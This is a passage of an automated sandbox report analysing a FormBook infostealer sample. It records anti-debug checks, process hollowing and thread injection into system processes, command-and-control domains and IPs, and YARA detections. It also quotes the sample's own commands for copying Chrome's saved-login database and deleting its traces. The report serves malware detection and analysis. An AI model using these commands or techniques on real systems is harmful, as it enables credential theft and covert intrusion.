            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]5_2_03BDC600
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]5_2_03BDC600
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]5_2_03BDC600
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C08E00 mov eax, dword ptr fs:[00000030h]5_2_03C08E00
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91608 mov eax, dword ptr fs:[00000030h]5_2_03C91608
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]5_2_03BFAE73
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]5_2_03BFAE73
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]5_2_03BFAE73
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]5_2_03BFAE73
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]5_2_03BFAE73
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE766D mov eax, dword ptr fs:[00000030h]5_2_03BE766D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h]5_2_03C0A61C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h]5_2_03C0A61C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8FE3F mov eax, dword ptr fs:[00000030h]5_2_03C8FE3F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]5_2_03BE7E41
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]5_2_03BE7E41
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]5_2_03BE7E41
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]5_2_03BE7E41
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]5_2_03BE7E41
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]5_2_03BE7E41
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]5_2_03C56DC9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]5_2_03C56DC9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]5_2_03C56DC9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov ecx, dword ptr fs:[00000030h]5_2_03C56DC9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]5_2_03C56DC9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]5_2_03C56DC9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]5_2_03C9FDE2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]5_2_03C9FDE2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]5_2_03C9FDE2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]5_2_03C9FDE2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]5_2_03BD2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]5_2_03BD2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]5_2_03BD2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]5_2_03BD2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]5_2_03BD2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C88DF1 mov eax, dword ptr fs:[00000030h]5_2_03C88DF1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]5_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]5_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]5_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]5_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h]5_2_03C0FD9B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h]5_2_03C0FD9B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h]5_2_03BED5E0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h]5_2_03BED5E0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C035A1 mov eax, dword ptr fs:[00000030h]5_2_03C035A1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h]5_2_03CA05AC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h]5_2_03CA05AC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]5_2_03C01DB5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]5_2_03C01DB5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]5_2_03C01DB5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C13D43 mov eax, dword ptr fs:[00000030h]5_2_03C13D43
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53540 mov eax, dword ptr fs:[00000030h]5_2_03C53540
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]5_2_03BE3D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAD30 mov eax, dword ptr fs:[00000030h]5_2_03BDAD30
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h]5_2_03BFC577
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h]5_2_03BFC577
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF7D50 mov eax, dword ptr fs:[00000030h]5_2_03BF7D50
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9E539 mov eax, dword ptr fs:[00000030h]5_2_03C9E539
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C5A537 mov eax, dword ptr fs:[00000030h]5_2_03C5A537
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]5_2_03C04D3B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]5_2_03C04D3B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]5_2_03C04D3B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8D34 mov eax, dword ptr fs:[00000030h]5_2_03CA8D34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8CD6 mov eax, dword ptr fs:[00000030h]5_2_03CA8CD6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE849B mov eax, dword ptr fs:[00000030h]5_2_03BE849B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C914FB mov eax, dword ptr fs:[00000030h]5_2_03C914FB
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]5_2_03C56CF0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]5_2_03C56CF0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]5_2_03C56CF0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A44B mov eax, dword ptr fs:[00000030h]5_2_03C0A44B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h]5_2_03C6C450
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h]5_2_03C6C450
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]5_2_03CA740D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]5_2_03CA740D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]5_2_03CA740D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]5_2_03C91C06
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]5_2_03C56C0A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]5_2_03C56C0A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]5_2_03C56C0A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]5_2_03C56C0A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF746D mov eax, dword ptr fs:[00000030h]5_2_03BF746D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0BC2C mov eax, dword ptr fs:[00000030h]5_2_03C0BC2C
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk,5_2_03C19A50

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: IconCachet0hh.exe.7.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.gografic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 154.55.180.56 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.moneytaoism.com
            Source: C:\Windows\explorer.exeDomain query: www.naturathome.info
            Source: C:\Windows\explorer.exeDomain query: www.6111.site
            Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.187 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 38.54.163.57 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.kidsfundoor.com
            Source: C:\Windows\explorer.exeDomain query: www.choonchain.com
            Source: C:\Windows\explorer.exeDomain query: www.empireapothecary.com
            Source: C:\Windows\explorer.exeDomain query: www.huangse5.com
            Source: C:\Windows\explorer.exeDomain query: www.nutricognition.com
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.trisuaka.xyz
            Source: C:\Windows\explorer.exeDomain query: www.trendiddas.com
            Source: C:\Windows\explorer.exeDomain query: www.nomaxdic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 156.226.60.131 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.designgamagazine.com
            Source: C:\Windows\explorer.exeDomain query: www.shopwithtrooperdavecom.com
            Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
            Sample uses process hollowing technique
            Source: C:\Windows\SysWOW64\cmd.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1080000Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 50410000Jump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3430000Jump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3440000Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 50410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3430000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3440000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmd.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3968Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3968
            Drops or copies cmd.exe with a different name (likely to bypass HIPS)
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exeJump to dropped file
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\TR0627729920002.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 3440000Jump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /kJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /kJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /kJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: explorer.exe, 00000007.00000000.350508051.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.281636648.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441279364.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
            Source: explorer.exe, 00000007.00000000.291986070.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.362079139.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.358486470.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.350564915.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374071514.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441429603.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Shared Modules            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium3
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Exploitation for Client Execution            		11
            Registry Run Keys / Startup Folder            		912
            Process Injection            		1
